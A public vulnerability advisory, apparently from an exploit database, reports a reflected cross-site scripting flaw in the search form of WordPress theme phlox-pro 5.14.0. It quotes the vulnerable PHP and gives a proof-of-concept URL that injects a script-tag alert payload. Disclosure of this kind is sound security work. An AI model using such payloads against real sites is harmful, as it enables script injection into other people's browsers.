WordPress Theme phlox-pro 5.14.0 - 'searchform' Cross-Site Scripting (XSS)

2023.12.04
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: WordPress Theme phlox-pro 5.14.0 - 'searchform' Cross-Site Scripting (XSS) # Date: 3/12/2023 # Exploit Author: Haktrak Team # Vendor Homepage: https://phlox.pro # Software Link: https://www.phlox.pro/go/ # Version: 5.14.0 # Tested on: Linux[apache]/wordrepss 6.3.1 Description: A Cross Site Scripting (XSS) vulnerability exists in WordPress Theme phlox-pro Vulnerable Code: <form method="get" id="searchform" class="searchform" action="<?php echo esc_url( home_url( '/' ) ); ?>"> <input type="text" class="field" name="s" id="s" placeholder="<?php esc_attr_e( 'Search Here', 'phlox-pro'); ?>" value="<?php the_search_query(); ?>" /> Steps to exploit: 1) Go to searchform 2) Insert your payload in the "search" Proof of concept (Poc): The following payload will allow you to run the javascript - https://example.com/?s=ok&%27><script>alert(%27XSS%27)</script>123=1


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top